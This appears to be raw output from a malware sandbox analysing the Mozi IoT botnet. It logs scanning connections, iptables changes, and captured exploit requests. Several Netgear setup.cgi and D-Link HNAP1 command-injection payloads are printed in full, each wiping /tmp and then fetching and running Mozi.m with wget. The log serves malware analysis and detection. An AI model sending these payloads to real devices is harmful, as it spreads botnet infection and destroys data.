              Source: global trafficTCP traffic: 192.168.2.20:58348 -> 168.250.138.140:5555
              Source: global trafficTCP traffic: 192.168.2.20:55030 -> 44.220.245.95:49152
              Source: global trafficTCP traffic: 192.168.2.20:47720 -> 29.14.27.225:37215
              Source: global trafficTCP traffic: 192.168.2.20:59538 -> 7.241.80.214:8443
              Source: global trafficTCP traffic: 192.168.2.20:43634 -> 34.225.150.107:8080
              Source: global trafficTCP traffic: 192.168.2.20:52194 -> 47.231.216.70:81
              Source: global trafficTCP traffic: 192.168.2.20:37442 -> 212.143.253.107:81
              Source: global trafficTCP traffic: 192.168.2.20:59358 -> 65.216.155.23:7574
              Source: global trafficTCP traffic: 192.168.2.20:56466 -> 118.131.81.154:8080
              Source: global trafficTCP traffic: 192.168.2.20:34080 -> 44.47.238.225:5555
              Source: global trafficTCP traffic: 192.168.2.20:39798 -> 218.248.249.73:5555
              Source: global trafficTCP traffic: 192.168.2.20:52340 -> 140.14.155.136:8080
              Source: global trafficTCP traffic: 192.168.2.20:46540 -> 178.94.151.209:8080
              Source: global trafficTCP traffic: 192.168.2.20:37480 -> 117.126.78.88:49152
              Source: global trafficTCP traffic: 192.168.2.20:43706 -> 39.26.183.64:7574
              Source: global trafficTCP traffic: 192.168.2.20:53336 -> 199.200.239.167:81
              Source: global trafficTCP traffic: 192.168.2.20:44878 -> 218.114.207.215:8080
              Source: global trafficTCP traffic: 192.168.2.20:37346 -> 107.123.183.3:7574
              Source: global trafficTCP traffic: 192.168.2.20:48882 -> 144.29.181.242:8443
              Source: global trafficTCP traffic: 192.168.2.20:48990 -> 32.69.49.22:8443
              Source: global trafficTCP traffic: 192.168.2.20:47446 -> 21.72.133.117:37215
              Source: global trafficTCP traffic: 192.168.2.20:42486 -> 59.252.33.99:52869
              Source: global trafficTCP traffic: 192.168.2.20:45654 -> 125.37.230.230:81
              Source: global trafficTCP traffic: 192.168.2.20:40820 -> 9.136.5.78:8080
              Source: global trafficTCP traffic: 192.168.2.20:42848 -> 30.229.23.209:49152
              Source: global trafficTCP traffic: 192.168.2.20:59242 -> 118.42.153.75:8080
              Source: global trafficTCP traffic: 192.168.2.20:58400 -> 163.23.143.240:5555
              Source: global trafficTCP traffic: 192.168.2.20:40834 -> 167.166.165.188:37215
              Source: global trafficTCP traffic: 192.168.2.20:54230 -> 170.170.215.3:81
              Source: global trafficTCP traffic: 192.168.2.20:41266 -> 120.70.220.231:49152
              Source: global trafficTCP traffic: 192.168.2.20:34204 -> 214.79.226.46:37215
              Source: global trafficTCP traffic: 192.168.2.20:59804 -> 83.105.227.81:52869
              Source: global trafficTCP traffic: 192.168.2.20:33210 -> 162.49.133.246:7574
              Source: global trafficTCP traffic: 192.168.2.20:47520 -> 48.107.62.30:52869
              Source: global trafficTCP traffic: 192.168.2.20:36042 -> 114.62.254.241:8080
              Source: global trafficTCP traffic: 192.168.2.20:38364 -> 29.187.230.13:37215
              Source: global trafficTCP traffic: 192.168.2.20:58634 -> 118.79.117.161:81
              Source: global trafficTCP traffic: 192.168.2.20:57594 -> 195.13.205.115:8080
              Source: global trafficTCP traffic: 192.168.2.20:54600 -> 58.64.250.170:8080
              Source: global trafficTCP traffic: 192.168.2.20:33484 -> 12.220.93.41:5555
              Source: global trafficTCP traffic: 192.168.2.20:36848 -> 71.27.191.205:37215
              Source: global trafficTCP traffic: 192.168.2.20:34424 -> 81.113.147.127:37215
              Source: global trafficTCP traffic: 192.168.2.20:48794 -> 101.144.254.54:8080
              Source: global trafficTCP traffic: 192.168.2.20:59766 -> 23.252.142.180:81
              Source: global trafficTCP traffic: 192.168.2.20:51454 -> 38.207.59.113:81
              Source: global trafficTCP traffic: 192.168.2.20:59246 -> 199.61.86.162:8080
              Source: global trafficTCP traffic: 192.168.2.20:48758 -> 15.247.121.248:7574
              Source: global trafficTCP traffic: 192.168.2.20:58824 -> 200.6.50.57:5555
              Source: global trafficTCP traffic: 192.168.2.20:38174 -> 121.11.201.253:8080
              Source: global trafficTCP traffic: 192.168.2.20:37392 -> 91.86.146.147:8080
              Source: global trafficTCP traffic: 192.168.2.20:58020 -> 86.140.199.244:8443
              Source: global trafficTCP traffic: 192.168.2.20:39284 -> 78.48.124.219:8080
              Source: global trafficTCP traffic: 192.168.2.20:43306 -> 204.174.36.179:8080
              Source: global trafficTCP traffic: 192.168.2.20:48968 -> 220.60.40.28:5555
              Source: global trafficTCP traffic: 192.168.2.20:45016 -> 86.62.181.10:8443
              Source: global trafficTCP traffic: 192.168.2.20:33718 -> 9.120.128.78:49152
              Source: global trafficTCP traffic: 192.168.2.20:50034 -> 55.131.55.4:5555
              Source: global trafficTCP traffic: 192.168.2.20:53096 -> 7.38.178.102:8080
              Source: global trafficTCP traffic: 192.168.2.20:39842 -> 51.37.81.128:8080
              Source: global trafficTCP traffic: 192.168.2.20:54390 -> 12.56.91.65:49152
              Source: global trafficTCP traffic: 192.168.2.20:41300 -> 64.241.138.149:49152
              Source: global trafficTCP traffic: 192.168.2.20:49826 -> 94.91.145.21:52869
              Source: global trafficTCP traffic: 192.168.2.20:56970 -> 139.183.125.68:8443
              Source: global trafficTCP traffic: 192.168.2.20:59406 -> 89.60.86.142:8080
              Source: global trafficTCP traffic: 192.168.2.20:54672 -> 60.66.131.171:7574
              Source: global trafficTCP traffic: 192.168.2.20:40870 -> 7.10.180.85:8443
              Source: global trafficTCP traffic: 192.168.2.20:40088 -> 12.129.41.73:37215
              Source: global trafficTCP traffic: 192.168.2.20:49544 -> 20.117.119.104:37215
              Source: global trafficTCP traffic: 192.168.2.20:36376 -> 76.121.218.200:8080
              Source: global trafficTCP traffic: 192.168.2.20:51938 -> 165.81.251.123:8080
              Source: global trafficTCP traffic: 192.168.2.20:39102 -> 64.153.76.145:52869
              Source: global trafficTCP traffic: 192.168.2.20:35942 -> 171.149.119.244:81
              Source: global trafficTCP traffic: 192.168.2.20:39162 -> 162.164.194.99:8080
              Source: global trafficTCP traffic: 192.168.2.20:59720 -> 130.80.222.213:8080
              Source: global trafficTCP traffic: 192.168.2.20:45416 -> 159.137.4.249:37215
              Source: global trafficTCP traffic: 192.168.2.20:50502 -> 1.210.36.98:49152
              Source: global trafficTCP traffic: 192.168.2.20:56038 -> 123.80.15.43:81
              Source: global trafficTCP traffic: 192.168.2.20:58790 -> 68.191.93.33:8080
              Source: /bin/sh (PID: 4613)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4662)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4675)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4710)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57738 -j ACCEPT
              Source: /bin/sh (PID: 4714)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4732)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4763)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4787)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57738 -j ACCEPT
              Source: /bin/sh (PID: 4860)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4878)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4897)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4909)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4940)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4959)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4994)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 5012)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 5028)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5050)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5062)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5091)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5100)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5124)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5140)Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5164)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5183)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5189)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5220)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5240)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT
              Source: /bin/sh (PID: 5243)Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 28537 -j ACCEPT
              Source: /bin/sh (PID: 5249)Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT
              Source: /bin/sh (PID: 5282)Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT
              Source: /bin/sh (PID: 5315)Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 71.41.225.74:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
              Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 92.246.94.253:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 81.6.188.111:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 85.214.105.212:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 23.210.67.167:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
              Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
